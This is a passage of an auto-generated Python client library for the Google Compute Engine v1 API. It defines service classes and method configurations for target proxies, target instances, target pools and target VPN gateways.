response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetHttpsProxy resource. Get a list of available target HTTPS proxies by making a list() request.
Args:
request: (ComputeTargetHttpsProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpsProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpsProxies.get',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpsProxiesGetRequest',
response_type_name=u'TargetHttpsProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetHttpsProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetHttpsProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpsProxies',
request_field=u'targetHttpsProxy',
request_type_name=u'ComputeTargetHttpsProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetHttpsProxy resources available to the specified project.
Args:
request: (ComputeTargetHttpsProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpsProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpsProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetHttpsProxies',
request_field='',
request_type_name=u'ComputeTargetHttpsProxiesListRequest',
response_type_name=u'TargetHttpsProxyList',
supports_download=False,
)
def SetSslCertificates(self, request, global_params=None):
"""Replaces SslCertificates for TargetHttpsProxy.
Args:
request: (ComputeTargetHttpsProxiesSetSslCertificatesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetSslCertificates')
return self._RunMethod(
config, request, global_params=global_params)
SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.setSslCertificates',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[],
relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setSslCertificates',
request_field=u'targetHttpsProxiesSetSslCertificatesRequest',
request_type_name=u'ComputeTargetHttpsProxiesSetSslCertificatesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetUrlMap(self, request, global_params=None):
"""Changes the URL map for TargetHttpsProxy.
Args:
request: (ComputeTargetHttpsProxiesSetUrlMapRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetUrlMap')
return self._RunMethod(
config, request, global_params=global_params)
SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.setUrlMap',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[],
relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setUrlMap',
request_field=u'urlMapReference',
request_type_name=u'ComputeTargetHttpsProxiesSetUrlMapRequest',
response_type_name=u'Operation',
supports_download=False,
)
class TargetInstancesService(base_api.BaseApiService):
"""Service class for the targetInstances resource."""
_NAME = u'targetInstances'
def __init__(self, client):
super(ComputeV1.TargetInstancesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of target instances.
Args:
request: (ComputeTargetInstancesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetInstanceAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetInstances.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/targetInstances',
request_field='',
request_type_name=u'ComputeTargetInstancesAggregatedListRequest',
response_type_name=u'TargetInstanceAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified TargetInstance resource.
Args:
request: (ComputeTargetInstancesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetInstances.delete',
ordered_params=[u'project', u'zone', u'targetInstance'],
path_params=[u'project', u'targetInstance', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
request_field='',
request_type_name=u'ComputeTargetInstancesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetInstance resource. Get a list of available target instances by making a list() request.
Args:
request: (ComputeTargetInstancesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetInstance) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetInstances.get',
ordered_params=[u'project', u'zone', u'targetInstance'],
path_params=[u'project', u'targetInstance', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
request_field='',
request_type_name=u'ComputeTargetInstancesGetRequest',
response_type_name=u'TargetInstance',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetInstance resource in the specified project and zone using the data included in the request.
Args:
request: (ComputeTargetInstancesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetInstances.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/targetInstances',
request_field=u'targetInstance',
request_type_name=u'ComputeTargetInstancesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of TargetInstance resources available to the specified project and zone.
Args:
request: (ComputeTargetInstancesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetInstanceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetInstances.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/targetInstances',
request_field='',
request_type_name=u'ComputeTargetInstancesListRequest',
response_type_name=u'TargetInstanceList',
supports_download=False,
)
class TargetPoolsService(base_api.BaseApiService):
"""Service class for the targetPools resource."""
_NAME = u'targetPools'
def __init__(self, client):
super(ComputeV1.TargetPoolsService, self).__init__(client)
self._upload_configs = {
}
def AddHealthCheck(self, request, global_params=None):
"""Adds health check URLs to a target pool.
Args:
request: (ComputeTargetPoolsAddHealthCheckRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddHealthCheck')
return self._RunMethod(
config, request, global_params=global_params)
AddHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.addHealthCheck',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addHealthCheck',
request_field=u'targetPoolsAddHealthCheckRequest',
request_type_name=u'ComputeTargetPoolsAddHealthCheckRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AddInstance(self, request, global_params=None):
"""Adds an instance to a target pool.
Args:
request: (ComputeTargetPoolsAddInstanceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddInstance')
return self._RunMethod(
config, request, global_params=global_params)
AddInstance.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.addInstance',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addInstance',
request_field=u'targetPoolsAddInstanceRequest',
request_type_name=u'ComputeTargetPoolsAddInstanceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of target pools.
Args:
request: (ComputeTargetPoolsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPoolAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetPools.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/targetPools',
request_field='',
request_type_name=u'ComputeTargetPoolsAggregatedListRequest',
response_type_name=u'TargetPoolAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified target pool.
Args:
request: (ComputeTargetPoolsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetPools.delete',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
request_field='',
request_type_name=u'ComputeTargetPoolsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified target pool. Get a list of available target pools by making a list() request.
Args:
request: (ComputeTargetPoolsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPool) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetPools.get',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
request_field='',
request_type_name=u'ComputeTargetPoolsGetRequest',
response_type_name=u'TargetPool',
supports_download=False,
)
def GetHealth(self, request, global_params=None):
"""Gets the most recent health check results for each IP for the instance that is referenced by the given target pool.
Args:
request: (ComputeTargetPoolsGetHealthRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPoolInstanceHealth) The response message.
"""
config = self.GetMethodConfig('GetHealth')
return self._RunMethod(
config, request, global_params=global_params)
GetHealth.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.getHealth',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/getHealth',
request_field=u'instanceReference',
request_type_name=u'ComputeTargetPoolsGetHealthRequest',
response_type_name=u'TargetPoolInstanceHealth',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a target pool in the specified project and region using the data included in the request.
Args:
request: (ComputeTargetPoolsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools',
request_field=u'targetPool',
request_type_name=u'ComputeTargetPoolsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of target pools available to the specified project and region.
Args:
request: (ComputeTargetPoolsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPoolList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetPools.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/targetPools',
request_field='',
request_type_name=u'ComputeTargetPoolsListRequest',
response_type_name=u'TargetPoolList',
supports_download=False,
)
def RemoveHealthCheck(self, request, global_params=None):
"""Removes health check URL from a target pool.
Args:
request: (ComputeTargetPoolsRemoveHealthCheckRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemoveHealthCheck')
return self._RunMethod(
config, request, global_params=global_params)
RemoveHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.removeHealthCheck',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeHealthCheck',
request_field=u'targetPoolsRemoveHealthCheckRequest',
request_type_name=u'ComputeTargetPoolsRemoveHealthCheckRequest',
response_type_name=u'Operation',
supports_download=False,
)
def RemoveInstance(self, request, global_params=None):
"""Removes instance URL from a target pool.
Args:
request: (ComputeTargetPoolsRemoveInstanceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemoveInstance')
return self._RunMethod(
config, request, global_params=global_params)
RemoveInstance.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.removeInstance',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeInstance',
request_field=u'targetPoolsRemoveInstanceRequest',
request_type_name=u'ComputeTargetPoolsRemoveInstanceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetBackup(self, request, global_params=None):
"""Changes a backup target pool's configurations.
Args:
request: (ComputeTargetPoolsSetBackupRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetBackup')
return self._RunMethod(
config, request, global_params=global_params)
SetBackup.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.setBackup',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[u'failoverRatio'],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/setBackup',
request_field=u'targetReference',
request_type_name=u'ComputeTargetPoolsSetBackupRequest',
response_type_name=u'Operation',
supports_download=False,
)
class TargetSslProxiesService(base_api.BaseApiService):
"""Service class for the targetSslProxies resource."""
_NAME = u'targetSslProxies'
def __init__(self, client):
super(ComputeV1.TargetSslProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetSslProxy resource.
Args:
request: (ComputeTargetSslProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetSslProxies.delete',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
request_field='',
request_type_name=u'ComputeTargetSslProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetSslProxy resource. Get a list of available target SSL proxies by making a list() request.
Args:
request: (ComputeTargetSslProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetSslProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetSslProxies.get',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
request_field='',
request_type_name=u'ComputeTargetSslProxiesGetRequest',
response_type_name=u'TargetSslProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetSslProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetSslProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies',
request_field=u'targetSslProxy',
request_type_name=u'ComputeTargetSslProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetSslProxy resources available to the specified project.
Args:
request: (ComputeTargetSslProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetSslProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetSslProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetSslProxies',
request_field='',
request_type_name=u'ComputeTargetSslProxiesListRequest',
response_type_name=u'TargetSslProxyList',
supports_download=False,
)
def SetBackendService(self, request, global_params=None):
"""Changes the BackendService for TargetSslProxy.
Args:
request: (ComputeTargetSslProxiesSetBackendServiceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetBackendService')
return self._RunMethod(
config, request, global_params=global_params)
SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setBackendService',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setBackendService',
request_field=u'targetSslProxiesSetBackendServiceRequest',
request_type_name=u'ComputeTargetSslProxiesSetBackendServiceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetProxyHeader(self, request, global_params=None):
"""Changes the ProxyHeaderType for TargetSslProxy.
Args:
request: (ComputeTargetSslProxiesSetProxyHeaderRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetProxyHeader')
return self._RunMethod(
config, request, global_params=global_params)
SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setProxyHeader',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setProxyHeader',
request_field=u'targetSslProxiesSetProxyHeaderRequest',
request_type_name=u'ComputeTargetSslProxiesSetProxyHeaderRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetSslCertificates(self, request, global_params=None):
"""Changes SslCertificates for TargetSslProxy.
Args:
request: (ComputeTargetSslProxiesSetSslCertificatesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetSslCertificates')
return self._RunMethod(
config, request, global_params=global_params)
SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setSslCertificates',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setSslCertificates',
request_field=u'targetSslProxiesSetSslCertificatesRequest',
request_type_name=u'ComputeTargetSslProxiesSetSslCertificatesRequest',
response_type_name=u'Operation',
supports_download=False,
)
class TargetTcpProxiesService(base_api.BaseApiService):
"""Service class for the targetTcpProxies resource."""
_NAME = u'targetTcpProxies'
def __init__(self, client):
super(ComputeV1.TargetTcpProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetTcpProxy resource.
Args:
request: (ComputeTargetTcpProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetTcpProxies.delete',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
request_field='',
request_type_name=u'ComputeTargetTcpProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetTcpProxy resource. Get a list of available target TCP proxies by making a list() request.
Args:
request: (ComputeTargetTcpProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetTcpProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetTcpProxies.get',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
request_field='',
request_type_name=u'ComputeTargetTcpProxiesGetRequest',
response_type_name=u'TargetTcpProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetTcpProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetTcpProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetTcpProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/targetTcpProxies',
request_field=u'targetTcpProxy',
request_type_name=u'ComputeTargetTcpProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetTcpProxy resources available to the specified project.
Args:
request: (ComputeTargetTcpProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetTcpProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetTcpProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetTcpProxies',
request_field='',
request_type_name=u'ComputeTargetTcpProxiesListRequest',
response_type_name=u'TargetTcpProxyList',
supports_download=False,
)
def SetBackendService(self, request, global_params=None):
"""Changes the BackendService for TargetTcpProxy.
Args:
request: (ComputeTargetTcpProxiesSetBackendServiceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetBackendService')
return self._RunMethod(
config, request, global_params=global_params)
SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetTcpProxies.setBackendService',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setBackendService',
request_field=u'targetTcpProxiesSetBackendServiceRequest',
request_type_name=u'ComputeTargetTcpProxiesSetBackendServiceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetProxyHeader(self, request, global_params=None):
"""Changes the ProxyHeaderType for TargetTcpProxy.
Args:
request: (ComputeTargetTcpProxiesSetProxyHeaderRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetProxyHeader')
return self._RunMethod(
config, request, global_params=global_params)
SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetTcpProxies.setProxyHeader',
ordered_params=[u'project', u'targetTcpProxy'],
path_params=[u'project', u'targetTcpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setProxyHeader',
request_field=u'targetTcpProxiesSetProxyHeaderRequest',
request_type_name=u'ComputeTargetTcpProxiesSetProxyHeaderRequest',
response_type_name=u'Operation',
supports_download=False,
)
class TargetVpnGatewaysService(base_api.BaseApiService):
"""Service class for the targetVpnGateways resource."""
_NAME = u'targetVpnGateways'
def __init__(self, client):
super(ComputeV1.TargetVpnGatewaysService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of target VPN gateways.
Args:
request: (ComputeTargetVpnGatewaysAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetVpnGatewayAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetVpnGateways.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/targetVpnGateways',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysAggregatedListRequest',
response_type_name=u'TargetVpnGatewayAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified target VPN gateway.
Args:
request: (ComputeTargetVpnGatewaysDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetVpnGateways.delete',
ordered_params=[u'project', u'region', u'targetVpnGateway'],
path_params=[u'project', u'region', u'targetVpnGateway'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified target VPN gateway. Get a list of available target VPN gateways by making a list() request.
Args:
request: (ComputeTargetVpnGatewaysGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetVpnGateway) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetVpnGateways.get',
ordered_params=[u'project', u'region', u'targetVpnGateway'],
path_params=[u'project', u'region', u'targetVpnGateway'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysGetRequest',
response_type_name=u'TargetVpnGateway',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a target VPN gateway in the specified project and region using the data included in the request.
Args:
request: (ComputeTargetVpnGatewaysInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetVpnGateways.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
request_field=u'targetVpnGateway',
request_type_name=u'ComputeTargetVpnGatewaysInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of target VPN gateways available to the specified project and region.
Args:
